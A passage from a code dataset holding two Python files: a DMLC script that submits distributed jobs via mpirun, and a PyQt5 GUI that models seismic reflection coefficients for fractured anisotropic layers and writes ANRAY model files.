source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
dmlc_mpi.py
|
#!/usr/bin/env python
"""
DMLC submission script, MPI version
"""
import argparse
import sys
import os
import subprocess
import tracker
from threading import Thread
parser = argparse.ArgumentParser(description='DMLC script to submit dmlc job using MPI')
parser.add_argument('-n', '--nworker', required=True, type=int,
help = 'number of worker proccess to be launched')
parser.add_argument('-s', '--server-nodes', default = 0, type=int,
help = 'number of server nodes to be launched')
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help = 'logging level')
parser.add_argument('--log-file', type=str,
help = 'output log to the specific log file')
parser.add_argument('-H', '--hostfile', type=str,
help = 'the hostfile of mpi server')
parser.add_argument('command', nargs='+',
help = 'command for dmlc program')
parser.add_argument('--host-ip', type=str,
help = 'the scheduler ip', default='ip')
args, unknown = parser.parse_known_args()
#
# submission script using MPI
#
def get_mpi_env(envs):
"""get the mpirun command for setting the envornment
support both openmpi and mpich2
"""
outfile="/tmp/mpiver"
os.system("mpirun 1>/tmp/mpiver 2>/tmp/mpiver")
with open (outfile, "r") as infile:
mpi_ver = infile.read()
cmd = ''
if 'Open MPI' in mpi_ver:
for k, v in envs.items():
cmd += ' -x %s=%s' % (k, str(v))
elif 'mpich' in mpi_ver:
for k, v in envs.items():
cmd += ' -env %s %s' % (k, str(v))
else:
raise Exception('unknow mpi version %s' % (mpi_ver))
return cmd
def mpi_submit(nworker, nserver, pass_envs):
"""
customized submit script, that submit nslave jobs, each must contain args as parameter
note this can be a lambda function containing additional parameters in input
Parameters
nworker number of slave process to start up
nserver number of server nodes to start up
pass_envs enviroment variables to be added to the starting programs
"""
def run(prog):
""""""
subprocess.check_call(prog, shell = True)
cmd = ''
if args.hostfile is not None:
cmd = '--hostfile %s' % (args.hostfile)
cmd += ' ' + ' '.join(args.command) + ' ' + ' '.join(unknown)
# start servers
if nserver > 0:
pass_envs['DMLC_ROLE'] = 'server'
prog = 'mpirun -n %d %s %s' % (nserver, get_mpi_env(pass_envs), cmd)
thread = Thread(target = run, args=(prog,))
thread.setDaemon(True)
thread.start()
if nworker > 0:
pass_envs['DMLC_ROLE'] = 'worker'
prog = 'mpirun -n %d %s %s' % (nworker, get_mpi_env(pass_envs), cmd)
thread = Thread(target = run, args=(prog,))
thread.setDaemon(True)
thread.start()
tracker.config_logger(args)
tracker.submit(args.nworker, args.server_nodes, fun_submit = mpi_submit,
hostIP=args.host_ip,
pscmd=(' '.join(args.command) + ' ' + ' '.join(unknown)))
|
fractureP_S.py
|
import os
import subprocess
import sys
import threading
import shutil
import numpy as np
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from sympy import roots
from sympy.abc import x
from fractureP_S_gui import Ui_MainWindow
class MyFirstGuiProgram(Ui_MainWindow):
def __init__(self, dialog):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
###Cria o layout para plotagem
# figura Tab1
self.fig = Figure(figsize=(8,3),facecolor='white')
self.fig.subplots_adjust(hspace= 0.40, wspace= 0.60,left=0.10, right=0.98, top=0.88, bottom=0.14)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.widget)
layout = QtWidgets.QVBoxLayout()
self.widget.setLayout(layout)
layout.addWidget(self.canvas)
self.mpl_toolbar = NavigationToolbar(self.canvas, self.widget)
self.fig.text(0.5, 0.1, 'Geofone', va='center')
self.fig.text(0.02, 0.33, 'Tempo(s)', va='center', rotation='vertical')
self.fig.text(0.45, 0.5, 'Ângulo de incidência (graus)', va='center', size= 8)
self.fig.text(0.02, 0.73, 'Coeficiente de reflexão', va='center', rotation='vertical', size=7)
self.axes = self.fig.add_subplot(211)
self.axes2 = self.axes.twiny()
self.axes.grid()
self.axes_time = self.fig.add_subplot(212)
self.axes.tick_params(labelsize=6)
self.axes2.tick_params(labelsize=6)
self.axes_time.tick_params(labelsize=6)
self.axes_time.grid()
#figura tab2
self.fig_anray = Figure(figsize=(9,6), facecolor='white')
self.fig_anray2 = Figure(figsize=(9, 6), facecolor='white')
self.fig_anray.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray.text(0.985, 0.6, 'Separação', va='center', rotation='vertical')
self.fig_anray.text(0.5, 0.12, 'Geofone', va='center')
self.fig_anray2.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray2.text(0.5, 0.12, 'Geofone', va='center')
self.canvas_anray = FigureCanvas(self.fig_anray)
self.canvas_anray2 = FigureCanvas(self.fig_anray2)
self.canvas_anray.setParent(self.widget_anray)
self.canvas_anray2.setParent(self.widget_anray2)
layout = QtWidgets.QVBoxLayout()
layout2 = QtWidgets.QVBoxLayout()
self.widget_anray.setLayout(layout)
layout.addWidget(self.canvas_anray)
self.widget_anray2.setLayout(layout2)
layout2.addWidget(self.canvas_anray2)
self.mpl_toolbar = NavigationToolbar(self.canvas_anray, self.widget_anray)
self.mpl_toolbar2 = NavigationToolbar(self.canvas_anray2, self.widget_anray2)
self.fig_anray.subplots_adjust(hspace=0.27, left=0.10, right=0.92, top=0.92, bottom=0.18)
self.fig_anray2.subplots_adjust(hspace=0.27, left=0.10, right=0.98, top=0.93, bottom=0.18)
#subplots
self.axes_anray_tot = self.fig_anray.add_subplot(411)
self.axes_anray2_tot = self.fig_anray2.add_subplot(411)
self.axes_anray_tot2 = self.axes_anray_tot.twinx()
self.axes_anray_tot.set_ylabel("total")
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray_rad = self.fig_anray.add_subplot(412)
self.axes_anray2_rad = self.fig_anray2.add_subplot(412)
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray_rad2 = self.axes_anray_rad.twinx()
self.axes_anray_z = self.fig_anray.add_subplot(413)
self.axes_anray2_z = self.fig_anray2.add_subplot(413)
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray_z2 = self.axes_anray_z.twinx()
self.axes_anray_time = self.fig_anray.add_subplot(414)
self.axes_anray2_time = self.fig_anray2.add_subplot(414)
self.axes_anray_time.set_ylabel('tempo')
self.axes_anray2_time.set_ylabel('tempo')
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray2_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
self.axes_anray_tot.tick_params(labelsize=6)
self.axes_anray_rad.tick_params(labelsize=6)
self.axes_anray2_rad.tick_params(labelsize=6)
self.axes_anray_tot2.tick_params(labelsize=6)
self.axes_anray_rad2.tick_params(labelsize=6)
self.axes_anray_z.tick_params(labelsize=6)
self.axes_anray_z2.tick_params(labelsize=6)
self.axes_anray2_tot.tick_params(labelsize=6)
self.axes_anray2_z.tick_params(labelsize=6)
###
#figura tab3
self.fig_sismo = Figure(dpi=50, facecolor='white')
self.canvas_sismo = FigureCanvas(self.fig_sismo)
self.canvas_sismo.setParent(self.widget_sismo)
self.fig_sismo.subplots_adjust(wspace=0.11, left=0.05, right=0.98, top=0.93, bottom=0.10)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo.setLayout(layout)
layout.addWidget(self.canvas_sismo)
self.axes_sismo_x = self.fig_sismo.add_subplot(121)
self.axes_sismo_z = self.fig_sismo.add_subplot(122)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo, self.widget_sismo)
self.fig_sismo.text(0.48, 0.04, 'Distância (m)', va='center', size= 14)
self.fig_sismo.text(0.01, 0.5, 'Tempo (s)', va='center', rotation='vertical', size= 14)
self.fig_sismo.text(0.25, 0.96, 'Radial', va='center', size= 14)
self.fig_sismo.text(0.75, 0.96, 'Vertical', va='center', size=14)
#figura tab4
self.fig_sismo2 = Figure(dpi=100, facecolor='white')
self.canvas_sismo2 = FigureCanvas(self.fig_sismo2)
self.canvas_sismo2.setParent(self.widget_sismo2)
self.fig_sismo2.set_tight_layout(True)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo2.setLayout(layout)
layout.addWidget(self.canvas_sismo2)
self.axes_sismo2_1 = self.fig_sismo2.add_subplot(211)
self.axes_sismo2_2 = self.fig_sismo2.add_subplot(212)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo2, self.widget_sismo2)
###Define os valores iniciais
self.spinBox_vp1.setValue(2250)
self.spinBox_vs1.setValue(1200)
self.spinBox_p1.setValue(2100)
self.spinBox_vp2.setValue(4500)
self.spinBox_vs2.setValue(2500)
self.spinBox_p2.setValue(2700)
#Velocidades do modelo de Ruger1997 (para teste)
# self.spinBox_vp1.setValue(2260)
# self.spinBox_vs1.setValue(1428)
# self.spinBox_p1.setValue(2600)
# self.spinBox_vp2.setValue(2485)
# self.spinBox_vs2.setValue(1489)
# self.spinBox_p2.setValue(2700)
self.doubleSpinBox_aspect.setValue(0.01)
self.spinBox_fract.setValue(5)
self.doubleSpinBox_bulk.setValue(2.2)
self.doubleSpinBox_shear.setValue(0)
self.spinBox_thick.setValue(100)
self.spinBox_ngeo.setValue(48)
self.spinBox_rmin.setValue(20)
self.spinBox_rstep.setValue(2)
self.size = 0
self.size_plot = 0
self.time_basalto =0
self.time_solo = 0
self.refl_tot_0 = 0
self.refl_tot_30 = 0
self.refl_tot_45 = 0
self.refl_tot_60 = 0
self.refl_tot_90 = 0
self.refl_x_0 = 0
self.refl_x_30 = 0
self.refl_x_45 = 0
self.refl_x_60 = 0
self.refl_x_90 = 0
self.refl_y_0 = 0
self.refl_y_30 = 0
self.refl_y_45 = 0
self.refl_y_60 = 0
self.refl_y_90 = 0
self.refl_z_0 = 0
self.refl_z_30 = 0
self.refl_z_45 = 0
self.refl_z_60 = 0
self.refl_z_90 = 0
self.refl_solo_rad_0 = 0
self.refl_solo_y_0 = 0
self.refl_solo_z_0 = 0
self.refl_solo_x_30 = 0
self.refl_solo_y_30 = 0
self.refl_solo_z_30 = 0
self.refl_solo_x_45 = 0
self.refl_solo_y_45 = 0
self.refl_solo_z_45 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_90 = 0
self.refl_solo_y_90 = 0
self.refl_solo_z_90 = 0
self.solo_fase_rad = 0 #para o solo as fases são iguais em todos azimutes...
self.solo_fase_z = 0
self.hti_fase_rad_0 = 0
self.hti_fase_rad_30 = 0
self.hti_fase_rad_45 = 0
self.hti_fase_rad_60 = 0
self.hti_fase_rad_90 = 0
self.hti_fase_z_0 = 0
self.hti_fase_z_30 = 0
self.hti_fase_z_45 = 0
self.hti_fase_z_60 = 0
self.hti_fase_z_90 = 0
self.dn = 0
self.dt = 0
###
###define as ações
self.spinBox_vp1.valueChanged.connect(self.vp1)
self.spinBox_vp2.valueChanged.connect(self.vp2)
self.spinBox_vs1.valueChanged.connect(self.plot)
self.spinBox_p1.valueChanged.connect(self.plot)
self.spinBox_vp2.valueChanged.connect(self.weak_calc)
self.spinBox_vs2.valueChanged.connect(self.weak_calc)
self.spinBox_p2.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_aspect.valueChanged.connect(self.weak_calc)
self.spinBox_fract.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_aspect.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_bulk.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_shear.valueChanged.connect(self.weak_calc)
self.verticalSlider_fract.valueChanged.connect(self.weak_calc)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.spinBox_ngeo.valueChanged.connect(self.plot)
self.spinBox_rmin.valueChanged.connect(self.plot)
self.spinBox_rstep.valueChanged.connect(self.plot)
self.spinBox_thick.valueChanged.connect(self.plot)
self.split_box0_90.stateChanged.connect(self.plot)
self.split_box0_45.stateChanged.connect(self.plot)
self.split_box45_90.stateChanged.connect(self.plot)
self.split_box30_60.stateChanged.connect(self.plot)
self.split_box_anray_0_90.stateChanged.connect(self.split)
self.split_box_anray_0_45.stateChanged.connect(self.split)
self.split_box_anray_30_60.stateChanged.connect(self.split)
self.split_box_anray_45_90.stateChanged.connect(self.split)
self.pushButton.clicked.connect(self.anray)
self.checkBox_solo.pressed.connect(self.activate)
self.checkBox_solo.released.connect(self.plot)
self.pushButton_2.pressed.connect(self.plot)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.sismo_button.clicked.connect(self.plot_sismograma)
self.radioButton_0.toggled.connect(self.plot_sismograma_v)
self.radioButton_30.toggled.connect(self.plot_sismograma_v)
self.radioButton_45.toggled.connect(self.plot_sismograma_v)
self.radioButton_60.toggled.connect(self.plot_sismograma_v)
self.radioButton_90.toggled.connect(self.plot_sismograma_v)
self.radioButton_plot_x.toggled.connect(self.plot_sismo_azim)
self.radioButton_plot_z.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_45.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_45_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_30_60.toggled.connect(self.plot_sismo_azim)
self.checkBox_solo_sismo.clicked.connect(self.sismo_enable)
self.az_tmin.valueChanged.connect(self.plot_sismo_azim)
self.az_tmax.valueChanged.connect(self.plot_sismo_azim)
self.slider_pos()
self.anray_path = os.getcwd()
if not os.path.exists('HTI_P_S_model'):
os.makedirs('HTI_P_S_model')
def vp1(self):
vp = self.spinBox_vp1.value()
vs = vp/np.sqrt(3)
self.spinBox_vs1.setValue(vs)
def vp2(self):
vp = self.spinBox_vp2.value()
vs = vp/np.sqrt(3)
self.spinBox_vs2.setValue(vs)
def message(self):
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Erro")
msg.setInformativeText("Certifique-se de gerar os arquivos e manter a opção (solo) correspondente na primeira aba.")
msg.exec_()
#Função para ativar a camada de solo nos cálculos
def activate(self):
if self.checkBox_solo.isChecked():
self.solo_espessura.setDisabled(True)
self.solo_vp.setDisabled(True)
self.solo_vs.setDisabled(True)
self.solo_densidade.setDisabled(True)
else:
self.solo_espessura.setEnabled(True)
self.solo_vp.setEnabled(True)
self.solo_vs.setEnabled(True)
self.solo_densidade.setEnabled(True)
self.pushButton_2.setEnabled(True)
#Funções para ajustar spinbox e slider.
def slider_pos(self):
self.verticalSlider_fract.setValue(self.spinBox_fract.value())
def slider_pos1(self):
self.doubleSpinBox_aspect.setValue(self.verticalSlider_aspect.value() / 10000)
def slider_pos2(self):
self.verticalSlider_DN.setValue(self.doubleSpinBox_DN.value()*1000)
self.verticalSlider_DT.setValue(self.doubleSpinBox_DT.value()*1000)
def slider_pos3(self):
self.doubleSpinBox_DN.setValue(self.verticalSlider_DN.value()/1000)
self.doubleSpinBox_DT.setValue(self.verticalSlider_DT.value()/1000)
self.aniso_parameters()
#Função para calcular os parametros de fraqueza
def weak_calc(self):
self.doubleSpinBox_DN.valueChanged.disconnect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.disconnect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.disconnect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.disconnect(self.slider_pos3)
#Ajusta o valor do spinbox de acordo com o slider
self.spinBox_fract.setValue(self.verticalSlider_fract.value())
self.verticalSlider_aspect.setValue(self.doubleSpinBox_aspect.value()*10000)
# grau de fraturamento e aspect_ratio
e = self.spinBox_fract.value() / 100
a = self.doubleSpinBox_aspect.value()
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
g = (vs2 ** 2) / (vp2 ** 2)
# parametro de Lame
mu = p2 * (vs2 ** 2)
# bulk and shear modulus
kl = self.doubleSpinBox_bulk.value() * 10 ** 9
ul = self.doubleSpinBox_shear.value() * 10 ** 9
# grau de fraturamento de Hudson. Obtido de Chen 2014 (2) e Bakulin 2000 (14)
DN = 4 * e / (3 * g * (1 - g) * (1 + ((kl + (4 / 3) * ul) / (np.pi * (1 - g) * mu * a))))
self.doubleSpinBox_DN.setValue(DN)
self.verticalSlider_DN.setValue(DN*1000)
DT= 16 * e / (3 * (3 - 2 * g) * (1 + ((4 * ul) / (np.pi * (3 - 2 * g) * mu * a))))
self.doubleSpinBox_DT.setValue(DT)
self.verticalSlider_DT.setValue(DT*1000)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.aniso_parameters()
#Função que calcula os parametros de anisotropia
def aniso_parameters(self):
self.doubleSpinBox_d.valueChanged.disconnect(self.plot)
self.doubleSpinBox_e.valueChanged.disconnect(self.plot)
self.doubleSpinBox_y.valueChanged.disconnect(self.plot)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
DN_H = self.doubleSpinBox_DN.value()
DT_H = self.doubleSpinBox_DT.value()
# A partir de Chen 2014 e Bakulin 2000 (27)
# parametros de Lame
lamb = p2 * (vp2 ** 2 - 2 * (vs2 ** 2))
mu = p2 * (vs2 ** 2)
M = lamb + 2 * mu
r = lamb / M
c11 = M * (1 - DN_H)
c33 = M * (1 - (r ** 2) * DN_H)
c13 = lamb * (1 - DN_H)
c44 = mu
c66 = mu * (1 - DT_H)
c55 = c66
c23 = c33 - 2 * c44
self.c11 = (c11/p2)/1000000
self.c13 = (c13/p2)/1000000
self.c23 = (c23/p2)/1000000
self.c33 = (c33/p2)/1000000
self.c44 = (c44/p2)/1000000
self.c55 = (c55 /p2)/1000000
#Para imprimir os parâmetros elásticos, descomentar as linhas abaixo.
# print('A11=', c11/p2)
# print('A13=', c13/p2)
# print('A23=', c23/p2)
# print('A33=', c33/p2)
# print('A44=', c44/p2)
# print('A55=', c55/p2)
self.dn = DN_H
self.dt = DT_H
e2_v = (c11 - c33) / (2 * c33)
self.doubleSpinBox_e.setValue(abs(e2_v))
d2_v = (((c13 + c55) ** 2) - ((c33 - c55) ** 2)) / (2 * c33 * (c33 - c55))
self.doubleSpinBox_d.setValue(abs(d2_v))
y2_v = (c66 - c44) / (2 * c44)
self.doubleSpinBox_y.setValue(abs(y2_v))
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.plot()
#Função que realiza a plotagem principal
def plot(self):
self.axes.cla()
self.axes_time.cla()
# Parametros do meio superior(1)
vp1 = self.spinBox_vp1.value()
vs1 = self.spinBox_vs1.value()
p1 = self.spinBox_p1.value()
# Parametros do meio inferior(2)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
# Impedância vertical
Z1 = p1 * vp1
Z2 = p2 * vp2
# Módulo de cisalhamento
G1 = p1 * pow(vs1, 2)
G2 = p2 * pow(vs2, 2)
# diferenças e médias
deltaZ = Z2 - Z1
medZ = (Z1 + Z2) / 2
deltaG = G2 - G1
medG = (G1 + G2) / 2
deltavp = vp2 - vp1
deltavp = vp2 - vp1
medvp = (vp1 + vp2) / 2
deltavs = vs2 - vs1
medvs = (vs1 + vs2) / 2
deltad = -self.doubleSpinBox_d.value()
deltae = -self.doubleSpinBox_e.value()
deltay = self.doubleSpinBox_y.value()
rmin = self.spinBox_rmin.value()
rstep = self.spinBox_rstep.value()
thick = self.spinBox_thick.value()
# ângulo de incidência crítico
ang_critico = np.arcsin(vp1 / vp2)
ang_critico_graus = ang_critico * 180 / np.pi
ang_text = str(round(ang_critico_graus,1))
self.label_33.setText('Ângulo crítico = ' + ang_text)
# angulo, geofone e cálculo de tempo
ngeo = self.spinBox_ngeo.value()
if self.checkBox_solo.isChecked():
v1 = self.solo_vp.value()
v2 = self.spinBox_vp1.value()
p1 = self.solo_espessura.value()
p2 = thick
theta_solo, a = self.geofone_to_angle(ngeo, rmin, rstep, p1)
geo, time1 = self.reflect_travel_time(1, p1, theta_solo, v1, 0, 0, 0)
theta = self.geofone_to_angle_2(ngeo, rmin, rstep, v1, v2, p1, p2)
geo, time2 = self.reflect_travel_time(2, p1, 0, v1, p2, theta, v2)
self.time_basalto = time2
self.time_solo = time1
self.axes_time.plot(geo, time1, color= 'brown', label='Solo')
self.axes_time.plot(geo, time2, color= 'blue', label='Basalto')
else:
theta, a = self.geofone_to_angle(ngeo, rmin, rstep, thick)
geo, time = self.reflect_travel_time(1, thick, theta, vp1, 0, 0, 0)
self.time_basalto = time
self.axes_time.plot(geo, time, color= 'blue', label = 'Basalto')
self.axes_time.grid()
self.axes_time.legend(title='Reflexão')
#Azimutes para o calculo do coeficiente de reflexão
phi1 = 0
phi2 = 30
phi3 = 45
phi4 = 60
phi5 = 90
A = (deltaZ / medZ) / 2
B1 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi1 * np.pi / 180), 2))
C1 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi1 * np.pi / 180), 4) + deltad * pow(np.sin(phi1 * np.pi / 180), 2) * pow(np.cos(phi1 * np.pi / 180), 2))
B2 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi2 * np.pi / 180), 2))
C2 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi2 * np.pi / 180), 4) + deltad * pow(np.sin(phi2 * np.pi / 180), 2) * pow(np.cos(phi2 * np.pi / 180), 2))
B3 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi3 * np.pi / 180), 2))
C3 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi3 * np.pi / 180), 4) + deltad * pow(np.sin(phi3 * np.pi / 180), 2) * pow(np.cos(phi3 * np.pi / 180), 2))
B4 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi4 * np.pi / 180), 2))
C4 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi4 * np.pi / 180), 4) + deltad * pow(np.sin(phi4 * np.pi / 180), 2) * pow(np.cos(phi4 * np.pi / 180), 2))
B5 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi5 * np.pi / 180), 2))
C5 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi5 * np.pi / 180), 4) + deltad * pow(np.sin(phi5 * np.pi / 180), 2) * pow(np.cos(phi5 * np.pi / 180), 2))
B_iso = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG))
C_iso = 0.5 * (deltavp / medvp)
coef_refl1 = A + B1 * pow(np.sin(theta * np.pi / 180), 2) + C1 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl2 = A + B2 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl3 = A + B3 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl4 = A + B4 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl5 = A + B5 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_iso = A + B_iso * pow(np.sin(theta * np.pi / 180), 2) + C_iso * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
if self.split_box0_90.isChecked():
dif1= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl5[i]) > abs(coef_refl1[i]):
dif1[i] = abs(coef_refl5[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
else:
dif1[i] = abs(coef_refl1[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
if self.split_box0_45.isChecked():
dif2= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl3[i]) > abs(coef_refl1[i]):
dif2[i] = abs(coef_refl3[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
else:
dif2[i] = abs(coef_refl1[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
if self.split_box45_90.isChecked():
dif3= np.zeros(len(coef_refl3))
for i in range(len(coef_refl3)):
if abs(coef_refl5[i]) > abs(coef_refl5[i]):
dif3[i] = abs(coef_refl5[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
else:
dif3[i] = abs(coef_refl3[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
if self.split_box30_60.isChecked():
dif4= np.zeros(len(coef_refl4))
for i in range(len(coef_refl4)):
if abs(coef_refl4[i]) > abs(coef_refl2[i]):
dif4[i] = abs(coef_refl4[i] - coef_refl2[i]) / abs(coef_refl2[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl2[i], 'go')
self.axes.plot(theta[i], coef_refl4[i], 'go')
break
else:
dif4[i] = abs(coef_refl2[i] - coef_refl4[i]) / abs(coef_refl4[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl4[i], 'go')
self.axes.plot(theta[i], coef_refl2[i], 'go')
break
self.axes.grid()
self.axes.plot(theta, coef_refl1, '+', label='0')
self.axes.plot(theta, coef_refl2, '+', label='30')
self.axes.plot(theta, coef_refl3, '+', label='45')
self.axes.plot(theta, coef_refl4, '+', label='60')
self.axes.plot(theta, coef_refl5, '+', label='90')
self.axes.plot(theta, coef_iso, label='iso', linewidth=2, linestyle='dashed', color='black')
self.axes2.set_xlim(self.axes.get_xlim())
self.axes2.set_xticks(theta)
self.axes2.set_xticklabels(a)
self.axes2.set_xlabel('Distância (m)', size=6)
for label in self.axes2.xaxis.get_ticklabels()[::2]:
label.set_visible(False)
self.axes.legend(title='Azimute', fontsize=6)
self.canvas.draw()
#Função para gerar arquivos anray para diferentes azimutes (0, 30, 45, 60, 90)
def anray(self):
azimute = np.array([0, 30, 45, 60, 90])
self.anray_file(azimute)
#Função que gera o arquivo do anray para um azimute específico.
def anray_file(self, azimute):
azh = azimute
self.size = 0
self.progressBar.setValue(self.size)
for h in azh:
self.size = self.size + 10
self.progressBar.setValue(self.size)
file = open('modelo_anray_%s.modelo' %h, 'w')
file.write("'modelo HTI azimute %s'\n" %(h))
file.write("/\n")
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s\n' % (2, 4, 10, 10))
else:
file.write('%s %s %s %s\n' % (2, 3, 10, 10))
#camada1
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 0))
file.write('%s %s\n' % (0, 0))
#camada de solo
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
# camada2
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
# camada3
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (2, 2))
#printerplot
file.write('%s %s\n%s %s\n%s %s\n' % (0, 0.5, 0.9, 1.1, 1.9, 2.1))
